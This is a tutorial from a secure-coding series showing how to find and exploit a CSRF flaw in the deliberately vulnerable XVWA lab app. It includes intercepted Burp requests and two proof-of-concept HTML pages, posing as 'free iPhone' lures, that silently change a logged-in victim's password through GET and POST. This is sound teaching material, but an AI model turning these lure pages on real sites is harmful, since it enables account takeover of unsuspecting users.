How to exploit CSRF Vulnerabilities
Introduction
In the previous article, we discussed what CSRF vulnerabilities are and what causes CSRF vulnerabilities. This article provides an overview of how CSRF vulnerabilities can be identified and exploited. We will make use of Xtreme Vulnerable Web Application (XVWA) as our target application and understand how one can identify and exploit CSRF vulnerabilities.
Learn Secure Coding
CSRF in web applications:
Cross Site Request Forgery vulnerabilities have a potential to occur wherever the application has features with state changes on the server side. These often occur through features with form submissions. One such For example, submitting a form to change password is a feature, where state change happens. In the next few sections, let us discuss how CSRF vulnerabilities can be discovered and exploited.
Finding Cross Site Request Forgery:
Let us launch Xtreme Vulnerable Web Application (XVWA) and navigate to CSRF. We can also access this challenge directly using the following URL.
The page looks as follows.
As we can see, a user can change his password using the form. Interestingly, the form is not asking for the user’s current password. Providing the new password twice will update the user’s password. If an attacker can trick the logged in user to submit this form with an attacker controlled password, the victim will change his password without his knowledge. It is needless to mention that the attack will work only if the developers do not implement appropriate protections against CSRF attacks.
Exploiting CSRF vulnerabilities
Let us first login to the application as an attacker using the following credentials.
Next, navigate to the vulnerable page and enter the new password twice and intercept the request using Burp Suite.
The request looks as follows.
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.105/xvwa/vulnerabilities/csrf/
Cookie: PHPSESSID=j8f2hcm4gbfj0oa3hkgb4n7f41
Upgrade-Insecure-Requests: 1
As we can notice, clicking the Submit button has resulted in a GET request. Now, an attacker can craft a link to a malicious page with the following proof of concept code.
<body>
<center>
<h1>A chance to win a free iPhone.</h1>
<br>
<br>
<a href="http://192.168.1.105/xvwa/vulnerabilities/csrf/?passwd=xvwa2&confirm=xvwa2&submit=submit">I want to participate</a>
</center>
</body>
</html>
This page can be hosted on an attacker controlled server and it looks as follows when someone accesses this page.
Now, let us login to XVWA as admin using the following credentials.
The following figure shows that the user admin is logged in.
Following is the cookie for this user, which can be seen using Developer Tools of the browser.
With a valid session as admin in XVWA, let us click the button I want to participate in the link provided by the attacker using the same browser and observe the http request using Burp proxy. We should see the following.
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.90/iphone.html
Cookie: PHPSESSID=j8f2hcm4gbfj0oa3hkgb4n7f41
Upgrade-Insecure-Requests: 1
As we can notice, a request to update user password has been made and forwarding the request will update the user’s password. In a real world scenario, the victim obviously just clicks the link without using a tool like Burp and the password will be updated silently.
Let us assume that the password change request is sent using POST instead of GET. The following excerpt can be used as a proof of concept exploit.
<body>
<center>
<h1>A chance to win a free iPhone</h1>
<form method="POST" action="http://192.168.1.105/xvwa/vulnerabilities/csrf/"><input type="hidden" value="xvwa2" name="passwd"><input type="hidden" value="xvwa2" name="confirm">
<input type="submit" value="I want to participate"></form>
</center>
</body>
</html>
When this page is accessed using a browser, it looks as follows.
Clicking the button produces the following HTTP request using POST.
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://192.168.1.90
Connection: close
Referer: http://192.168.1.90/iphone-post.html
Cookie: PHPSESSID=j8f2hcm4gbfj0oa3hkgb4n7f41
Upgrade-Insecure-Requests: 1
passwd=xvwa2&confirm=xvwa2
This request once again updates the user password without his knowledge.
Learn Secure Coding
Conclusion:
In this article, we have discussed how Cross Site Request Forgery vulnerabilities can be exploited in web applications. We have discussed how one can craft exploits for CSRF vulnerabilities both when the application is using GET and POST methods. CSRF vulnerabilities are often hard to mitigate due to the fact that developers find it hard to understand these. In a later article, we will discuss approaches that can be used to mitigate CSRF vulnerabilities.
Sources:
Learn Secure Coding Fundamentals
Discover how to recognize common software mistakes, how those mistakes are exploited by attackers and how you can mitigate them. What you'll learn:- Buffer overflows
- SQL injections
- Credential management
- Mitigating with secure code
- And more
In this Series
- How to exploit CSRF Vulnerabilities
- Enhancing code security: Tools and techniques for safeguarding your code
- DevSecOps Tools of the trade
- Software dependencies: The silent killer behind the world's biggest attacks
- Software composition analysis and how it can protect your supply chain
- Only 20% of new developers receive secure coding training, says report
- Introduction to Secure Software Development Life Cycle
- How to control the flow of a program in x86 assembly
- Mitigating MFA bypass attacks: 5 tips for developers
- How to diagnose and locate segmentation faults in x86 assembly
- How to use the ObjDump tool with x86
- Debugging your first x86 program
- How to build a program and execute an application entirely built in x86 assembly
- Overview of common x86 instructions
- x86 basics: Data representation, memory and information storage
- What is x86 assembly?
- Introduction to x86 assembly and syntax
- Introduction to variables
- How to mitigate Race Conditions vulnerabilities
- How to avoid Cryptography errors
- Cryptography errors Exploitation Case Study
- How to exploit Cryptography errors in applications
- How to exploit race conditions
- Email-based attacks with Python: Phishing, email bombing and more
- Attacking Web Applications With Python: Recommended Tools
- Attacking Web Applications With Python: Exploiting Web Forms and Requests
- Attacking Web Applications With Python: Web Scraper Python
- Python for Network Penetration Testing: Best Practices and Evasion Techniques
- Python for network penetration testing: Hacking Windows domain controllers with impacket Python tools
- Python Language Basics: Variables, Lists, Loops, Functions and Conditionals
- How to Mitigate Poor HTTP Usage Vulnerabilities
- How to Exploit Poor HTTP Usage
- Introduction to HTTP (What Makes HTTP Vulnerabilities Possible)
- How to Mitigate Integer Overflow and Underflow Vulnerabilities
- How to exploit integer overflow and underflow
- Introduction to Parallel Processing
- What are Race Conditions?
- How Are Credentials Used In Applications?
- How To Exploit Least Privilege Vulnerabilities
- XSS Vulnerabilities Exploitation Case Study
- What is is integer overflow and underflow?
- SQL Injection Vulnerabilities Exploitation Case Study
- How to exploit improper error handling
- Improper Error Handling Exploitation Case Study
- Why Improper Error Handling Happens
- How to mitigate CSRF Vulnerabilities
- What Causes Command Injection Vulnerabilities? (How are Data and Code Handled in Execution Environments)
- Command Injection Vulnerabilities
- Command Injection Vulnerabilities Exploitation Case Study
- How to mitigate Command Injection Vulnerabilities
- How to exploit SQL Injection Vulnerabilities
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Secure coding